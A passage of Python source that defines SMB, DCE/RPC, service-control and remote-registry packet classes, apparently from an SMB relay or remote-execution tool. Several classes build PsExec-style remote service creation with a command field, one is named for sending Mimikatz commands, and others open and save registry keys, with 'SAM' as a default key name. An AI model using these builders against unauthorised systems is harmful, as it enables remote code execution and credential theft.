("Reserved2", "\x00"),
|
|
("FileNameLen", "\x07\x00"),
|
|
("CreateFlags", "\x16\x00\x00\x00"),
|
|
("RootFID", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\x00\x00\x00\x02"),
|
|
("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("FileAttrib", "\x00\x00\x00\x00"),
|
|
("ShareAccess", "\x07\x00\x00\x00"),
|
|
("Disposition", "\x01\x00\x00\x00"),
|
|
("CreateOptions", "\x00\x00\x00\x00"),
|
|
("Impersonation", "\x02\x00\x00\x00"),
|
|
("SecurityFlags", "\x00"),
|
|
("Bcc", "\x08\x00"),
|
|
("FileName", ""),
|
|
("FileNameNull", "\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
|
|
self.fields["FileNameLen"] = StructWithLenPython2or3("<h",len(str(self.fields["FileName"])))
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(Data1))
|
|
|
|
class SMBLockingAndXResponse(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x02"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("Andxoffset", "\x00\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
])
|
|
|
|
class SMBReadData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0a"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
("FID", "\x00\x00"),
|
|
("Offset", "\x19\x03\x00\x00"),
|
|
("MaxCountLow", "\xed\x01"),
|
|
("MinCount", "\xed\x01"),
|
|
("Hidden", "\xff\xff\xff\xff"),
|
|
("Remaining", "\x00\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
|
|
class SMBWriteData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0e"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\xde\xde"),
|
|
("FID", "\x06\x40"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("TimeOut", "\x00\x00\x00\x00"),
|
|
("WriteMode", "\x01\x00"),
|
|
("Remaining", "\x00\x00"),
|
|
("DataLenHi", "\x00\x00"),
|
|
("DataLenLow", "\xdc\x02"),
|
|
("DataOffset", "\x40\x00"),
|
|
("HiOffset", "\x00\x00\x00\x00"),
|
|
("Bcc", "\xdc\x02"),
|
|
("Padding", "\x41"),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
self.fields["DataLenLow"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
|
|
|
|
class SMBDCERPCWriteData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0e"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
("FID", "\x06\x40"),
|
|
("Offset", "\xea\x03\x00\x00"),
|
|
("Reserved2", "\xff\xff\xff\xff"),
|
|
("WriteMode", "\x08\x00"),
|
|
("Remaining", "\xdc\x02"),
|
|
("DataLenHi", "\x00\x00"),
|
|
("DataLenLow", "\xdc\x02"),
|
|
("DataOffset", "\x3f\x00"),
|
|
("HiOffset", "\x00\x00\x00\x00"),
|
|
("Bcc", "\xdc\x02"),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["Remaining"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
self.fields["DataLenLow"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
|
|
|
|
|
|
class SMBTransDCERPC(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x10"),
|
|
("TotalParamCount", "\x00\x00"),
|
|
("TotalDataCount", "\x00\x00" ),
|
|
("MaxParamCount", "\x00\x00"),
|
|
("MaxDataCount", "\x00\x04"),
|
|
("MaxSetupCount", "\x00"),
|
|
("Reserved", "\x00\x00"),
|
|
("Flags", "\x00"),
|
|
("Timeout", "\x00\x00\x00\x00"),
|
|
("Reserved1", "\x00\x00"),
|
|
("ParamCount", "\x00\x00"),
|
|
("ParamOffset", "\x00\x00"),
|
|
("DataCount", "\x00\x00"),
|
|
("DataOffset", "\x00\x00"),
|
|
("SetupCount", "\x02"),
|
|
("Reserved2", "\x00"),
|
|
("OpNum", "\x26\x00"),
|
|
("FID", "\x00\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
("Terminator", "\x00"),
|
|
("PipeName", "\\PIPE\\"),
|
|
("PipeTerminator", "\x00\x00"),
|
|
("Data", ""),
|
|
|
|
])
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["Data"]))%2==0:
|
|
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["PipeTerminator"] = "\x00\x00\x00"
|
|
##Convert Path to Unicode first before any Len calc.
|
|
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le').decode('latin-1')
|
|
|
|
##Data Len
|
|
self.fields["TotalDataCount"] = StructWithLenPython2or3("<h", len(str(self.fields["Data"])))
|
|
self.fields["DataCount"] = StructWithLenPython2or3("<h", len(str(self.fields["Data"])))
|
|
|
|
##Packet len
|
|
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
|
|
|
|
self.fields["ParamOffset"] = StructWithLenPython2or3("<h", len(FindRAPOffset)+32)
|
|
self.fields["DataOffset"] = StructWithLenPython2or3("<h", len(FindRAPOffset)+32)
|
|
##Bcc Buff Len
|
|
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h", len(BccComplete))
|
|
|
|
|
|
class SMBDCEData(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x05"),
|
|
("VersionLow", "\x00"),
|
|
("PacketType", "\x0b"),
|
|
("PacketFlag", "\x03"),
|
|
("DataRepresent", "\x10\x00\x00\x00"),
|
|
("FragLen", "\x2c\x02"),
|
|
("AuthLen", "\x00\x00"),
|
|
("CallID", "\x01\x00\x00\x00"),
|
|
("MaxTransFrag", "\xd0\x16"),
|
|
("MaxRecvFrag", "\xd0\x16"),
|
|
("GroupAssoc", "\x00\x00\x00\x00"),
|
|
("CTXNumber", "\x01"),
|
|
("CTXPadding", "\x00\x00\x00"),
|
|
("CTX0ContextID", "\x00\x00"),
|
|
("CTX0ItemNumber", "\x01\x00"),
|
|
("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
|
|
("CTX0UIDVersion", "\x02\x00"),
|
|
("CTX0UIDVersionlo", "\x00\x00"),
|
|
("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
|
|
("CTX0UIDSyntaxVer", "\x02\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
|
|
|
|
|
|
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data1))
|
|
|
|
class SMBDCEPacketData(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x05"),
|
|
("VersionLow", "\x00"),
|
|
("PacketType", "\x00"),
|
|
("PacketFlag", "\x03"),
|
|
("DataRepresent", "\x10\x00\x00\x00"),
|
|
("FragLen", "\x00\x00"),
|
|
("AuthLen", "\x00\x00"),
|
|
("CallID", "\x00\x00\x00\x00"),
|
|
("AllocHint", "\x00\x00\x00\x00"),
|
|
("ContextID", "\x00\x00"),
|
|
("Opnum", "\x0f\x00"),
|
|
("Data", ""),
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
|
|
|
|
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data1))
|
|
self.fields["AllocHint"] = StructWithLenPython2or3("<i",len(str(self.fields["Data"])))
|
|
|
|
###Psexec
|
|
class SMBDCESVCCTLOpenManagerW(Packet):
|
|
fields = OrderedDict([
|
|
("MachineNameRefID", "\xb5\x97\xb9\xbc"),
|
|
("MaxCount", "\x0f\x00\x00\x00"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("ActualCount", "\x0f\x00\x00\x00"),
|
|
("MachineName", ""),
|
|
("MachineNameNull", "\x00\x00"),
|
|
("DbPointer", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\x3f\x00\x0f\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["MachineName"]))%2==0:
|
|
self.fields["MachineNameNull"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["MachineNameNull"] = "\x00\x00"
|
|
## Convert to UTF-16LE
|
|
self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["MachineName"]))+1)
|
|
self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["MachineName"]))+1)
|
|
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le').decode('latin-1')
|
|
|
|
class SMBDCESVCCTLCreateService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("MaxCount", "\x0c\x00\x00\x00"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("ActualCount", "\x0c\x00\x00\x00"),
|
|
("ServiceName", ""),
|
|
("MachineNameNull", "\x00\x00"),
|
|
("ReferentID", "\x00\x00\x02\x00"),
|
|
("MaxCountRefID", "\x11\x00\x00\x00"),
|
|
("OffsetID", "\x00\x00\x00\x00"),
|
|
("ActualCountRefID", "\x11\x00\x00\x00"),
|
|
("DisplayNameID", ""),
|
|
("DisplayNameIDNull", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\xff\x01\x0f\x00"),
|
|
("ServerType", "\x10\x00\x00\x00"),
|
|
("ServiceStartType", "\x03\x00\x00\x00"),
|
|
("ServiceErrorCtl", "\x00\x00\x00\x00"),
|
|
("BinPathMaxCount", "\xb6\x00\x00\x00"),
|
|
("BinPathOffset", "\x00\x00\x00\x00"),
|
|
("BinPathActualCount", "\xb6\x00\x00\x00"),
|
|
("BinCMD", ""),
|
|
("BinCMDTerminator", "\x00\x00"),
|
|
("LoadOrderGroup", "\x00\x00\x00\x00"),
|
|
("TagID", "\x00\x00\x00\x00"),
|
|
("Dependencies", "\x00\x00\x00\x00"),
|
|
("DependenciesLen", "\x00\x00\x00\x00"),
|
|
("ServiceStartUser", "\x00\x00\x00\x00"),
|
|
("Password", "\x00\x00\x00\x00"),
|
|
("PasswordLen", "\x00\x00\x00\x00"),
|
|
("Padding", "\x00\x00"),
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
BinDataLen = str(self.fields["BinCMD"])
|
|
|
|
#Padding
|
|
if len(str(self.fields["BinCMD"]))%2==0:
|
|
self.fields["LoadOrderGroup"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["LoadOrderGroup"] = "\x00\x00"
|
|
|
|
## Calculate first
|
|
self.fields["BinPathMaxCount"] = StructWithLenPython2or3("<i",len(BinDataLen)+1)
|
|
self.fields["BinPathActualCount"] = StructWithLenPython2or3("<i",len(BinDataLen)+1)
|
|
self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
|
|
self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
|
|
self.fields["MaxCountRefID"] = StructWithLenPython2or3("<i",len(str(self.fields["DisplayNameID"]))+1)
|
|
self.fields["ActualCountRefID"] = StructWithLenPython2or3("<i",len(str(self.fields["DisplayNameID"]))+1)
|
|
|
|
## Then convert to UTF-16LE
|
|
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le').decode('latin-1')
|
|
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le').decode('latin-1')
|
|
|
|
class SMBDCESVCCTLOpenService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("MaxCount", "\x00\x00\x00\x00"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("ActualCount", "\x00\x00\x00\x00"),
|
|
("ServiceName", ""),
|
|
("ServiceNameNull", "\x00\x00"),
|
|
("AccessMask", "\xff\x01\x0f\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["ServiceName"]))%2==0:
|
|
self.fields["ServiceNameNull"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["ServiceNameNull"] = "\x00\x00"
|
|
## Calculate first
|
|
self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
|
|
self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
|
|
## Then convert to UTF-16LE
|
|
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le').decode('latin-1')
|
|
|
|
class SMBDCESVCCTLStartService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
])
|
|
|
|
class SMBDCESVCCTLControlService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("ControlOperation", "\x01\x00\x00\x00"),
|
|
])
|
|
|
|
class SMBDCESVCCTLDeleteService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
])
|
|
|
|
class SMBDCESVCCTLCloseService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
])
|
|
|
|
class SMBDCESVCCTLQueryService(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
])
|
|
|
|
class SMBDCEMimiKatzRPCCommand(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandleLen", "\x07\x00\x00\x00"),
|
|
("ContextHandle", "\x00\x00\x00\x00"),
|
|
("ContextHandleLen2", "\x07\x00\x00\x00"),
|
|
("CMD", ""),
|
|
("CMDEnd", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["ContextHandleLen"] = StructWithLenPython2or3("<i",len(str(self.fields["CMD"]))+1)
|
|
self.fields["ContextHandleLen2"] = StructWithLenPython2or3("<i",len(str(self.fields["CMD"]))+1)
|
|
self.fields["CMD"] = self.fields["CMD"].encode('utf-16le').decode('latin-1')
|
|
|
|
|
|
class OpenAndX(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0f"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
("Flags", "\x07\x00"),
|
|
("DesiredAccess", "\xc2\x00"),
|
|
("SearchAttrib", "\x16\x00"),
|
|
("FileAttrib", "\x20\x00"),
|
|
("Created", "\x40\x9d\xc1\x57"),
|
|
("OpenFunc", "\x12\x00"),
|
|
("allocsize", "\x00\x00\x00\x00"),
|
|
("Timeout", "\x00\x00\x00\x00"),
|
|
("Reserved2", "\x00\x00\x00\x00"),
|
|
("Bcc", "\x0b\x00"),
|
|
("Terminator", ""),
|
|
("File", ""),
|
|
("FileNull", "\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
|
|
|
|
class ReadRequest(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x05"),
|
|
("FID", "\x02\x40"),
|
|
("Count", "\xf0\xff"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("RemainingBytes", "\xf0\xff"),
|
|
("Bcc", "\x00\x00"),
|
|
|
|
])
|
|
|
|
class ReadRequestAndX(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0C"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("AndXOffset", "\xde\xde"),
|
|
("FID", "\x02\x40"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("MaxCountLow", "\xf0\xff"),
|
|
("MinCount", "\xf0\xff"),
|
|
("Timeout", "\xff\xff\xff\xff"),
|
|
("RemainingBytes", "\xf0\xff"),
|
|
("HighOffset", "\x00\x00\x00\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
|
|
])
|
|
|
|
class SMBDCERPCReadRequestAndX(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0C"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("AndXOffset", "\xde\xde"),
|
|
("FID", "\x02\x40"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("MaxCountLow", "\xb8\x10"),
|
|
("MinCount", "\xb8\x10"),
|
|
("Timeout", "\xff\xff\xff\xff"),
|
|
("RemainingBytes", "\x00\x00"),
|
|
("HighOffset", "\x00\x00\x00\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
|
|
])
|
|
|
|
class WriteRequestAndX(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x06"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("AndXOffset", "\xde\xde"),
|
|
("FID", "\x02\x40"),
|
|
("Offset", "\x00\x00\x00\x00"),
|
|
("Reserved2", "\xff\xff\xff\xff"),
|
|
("WriteMode", "\x00\x00"),
|
|
("Remaining", "\x00\x00"),
|
|
("DataLenHi", "\x00\x00"),
|
|
("DataLenLow", "\x0a\x00"),#actual Len
|
|
("DataOffset", "\x3f\x00"),
|
|
("Bcc", "\x0a\x00"),
|
|
("Padd", ""),
|
|
("Data", ""),
|
|
|
|
])
|
|
|
|
class CloseRequest(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x03"),
|
|
("FID", "\x00\x00"),
|
|
("LastWrite", "\xff\xff\xff\xff"),
|
|
("Bcc", "\x00\x00"),
|
|
|
|
])
|
|
|
|
class DeleteFileRequest(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x01"),
|
|
("SearchAttributes", "\x06\x00"),
|
|
("Bcc", "\x1b\x00"),
|
|
("BuffType", "\x04"),
|
|
("File", ""),
|
|
("FileNull", "\x00\x00"),
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["File"] = self.fields["File"].encode('utf-16le').decode('latin-1')
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
|
|
|
|
class SMBEcho(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x01"),
|
|
("EchoCount", "\x01\x00"),
|
|
("Bcc", "\x1b\x00"),
|
|
("File", "LWO CW VLO DEO MAW LMW ARW"),#nt4 style.
|
|
("FileNull", "\x00"),
|
|
|
|
])
|
|
|
|
|
|
###Winreg
|
|
class SMBDCEWinRegOpenHKLMKey(Packet):
|
|
fields = OrderedDict([
|
|
("Ptr", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\x00\x00\x00\x02"),
|
|
])
|
|
|
|
class SMBDCEWinRegOpenHKCUKey(Packet):
|
|
fields = OrderedDict([
|
|
("Ptr", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\x00\x00\x00\x02"),
|
|
])
|
|
|
|
class SMBDCEWinRegOpenKey(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("KeySizeUnicode", "\x00\x00"),
|
|
("MaxKeySizeUnicode", "\x00\x00"),
|
|
("KeyPtr", "\xa9\xdc\x00\x00"),
|
|
("ActualKeyMaxSize", "\x00\x00\x00\x00"),#not unicode
|
|
("ActualKeyOffset", "\x00\x00\x00\x00"),
|
|
("ActualKeySize", "\x00\x00\x00\x00"),#not unicode
|
|
("Key", ""),
|
|
("KeyTerminator", "\x00\x00"),
|
|
("AccessOption", "\x01\x00\x00\x00"),
|
|
("AccessMask", "\x00\x00\x00\x02"),
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["Key"]))%2==0:
|
|
self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["KeyTerminator"] = "\x00\x00"
|
|
#Calc first.
|
|
self.fields["ActualKeyMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["Key"]))+1)
|
|
self.fields["ActualKeySize"] = StructWithLenPython2or3("<i",len(str(self.fields["Key"]))+1)
|
|
#Convert to unicode.
|
|
self.fields["Key"] = self.fields["Key"].encode('utf-16le').decode('latin-1')
|
|
#Recalculate again, in unicode this time.
|
|
self.fields["KeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["Key"]))+2)
|
|
self.fields["MaxKeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["Key"]))+2)
|
|
|
|
|
|
class SMBDCEWinRegQueryInfoKey(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("ClassNameLen", "\x00\x00"),
|
|
("ClassNameMaxLen", "\x00\x04"),
|
|
("ClassNameRefID", "\x68\x89\x00\x00"),
|
|
("ClassNameMaxCount", "\x00\x02\x00\x00"),
|
|
("ClassNameOffset", "\x00\x00\x00\x00"),
|
|
("ClassNameActualCount", "\x00\x00\x00\x00"),
|
|
|
|
])
|
|
|
|
class SMBDCEWinRegCloseKey(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
|
|
])
|
|
|
|
class SMBDCEWinRegCreateKey(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("KeySizeUnicode", "\x00\x00"),
|
|
("MaxKeySizeUnicode", "\x00\x00"),
|
|
("KeyPtr", "\xde\x01\x00\x00"),
|
|
("ActualKeyMaxSize", "\x00\x00\x00\x00"),
|
|
("ActualKeyOffset", "\x00\x00\x00\x00"),
|
|
("ActualKeySize", "\x00\x00\x00\x00"),
|
|
("KeyName", "SAM"),
|
|
("KeyTerminator", "\x00\x00"),
|
|
("KeyClassLen", "\x00\x00"),
|
|
("KeyClassMaxLen", "\x00\x00"),
|
|
("KeyClassPtr", "\x00\x00\x00\x00"),
|
|
("AccessOption", "\x01\x00\x00\x00"),
|
|
("AccessMask", "\x00\x00\x00\x02"),
|
|
("SecDescRefID", "\x29\xd8\x00\x00"),
|
|
("SecDescLen", "\x00\x00\x00\x00"),
|
|
("SecDescPtr", "\x00\x00\x00\x00"),
|
|
("SecDescMaxLen", "\x00\x00\x00\x00"),
|
|
("SecDescMaxSize", "\x00\x00\x00\x00"),
|
|
("Inherit", "\x00\x00\x00\x00"),
|
|
("AccessTakenRefID", "\x9c\x3e\x00\x00"),
|
|
("ActionTakenRefID", "\x01\x00\x00\x02"),
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["KeyName"]))%2==0:
|
|
self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["KeyTerminator"] = "\x00\x00"
|
|
#Calc first.
|
|
self.fields["ActualKeyMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["KeyName"]))+1)
|
|
self.fields["ActualKeySize"] = StructWithLenPython2or3("<i",len(str(self.fields["KeyName"]))+1)
|
|
#Convert to unicode.
|
|
self.fields["KeyName"] = self.fields["KeyName"].encode('utf-16le').decode('latin-1')
|
|
#Recalculate again, in unicode this time.
|
|
self.fields["KeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["KeyName"]))+2)
|
|
self.fields["MaxKeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["KeyName"]))+2)
|
|
|
|
class SMBDCEWinRegSaveKey(Packet):
|
|
fields = OrderedDict([
|
|
("ContextHandle", ""),
|
|
("FileSizeUnicode", "\x00\x00"),
|
|
("MaxFileSizeUnicode", "\x00\x00"),
|
|
("FilePtr", "\xa9\xdc\x00\x00"),
|
|
("ActualFileMaxSize", "\x00\x00\x00\x00"),#not unicode
|
|
("ActualFileOffset", "\x00\x00\x00\x00"),
|
|
("ActualFileSize", "\x00\x00\x00\x00"),#not unicode
|
|
("File", ""),
|
|
("FileTerminator", "\x00\x00"),
|
|
("SecAttrib", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["File"]))%2==0:
|
|
self.fields["FileTerminator"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["FileTerminator"] = "\x00\x00"
|
|
#Calc first.
|
|
self.fields["ActualFileMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["File"]))+1)
|
|
self.fields["ActualFileSize"] = StructWithLenPython2or3("<i",len(str(self.fields["File"]))+1)
|
|
#Convert to unicode.
|
|
self.fields["File"] = self.fields["File"].encode('utf-16le').decode('latin-1')
|
|
#Recalculate again, in unicode this time.
|
|
self.fields["FileSizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["File"]))+2)
|
|
self.fields["MaxFileSizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["File"]))+2)
|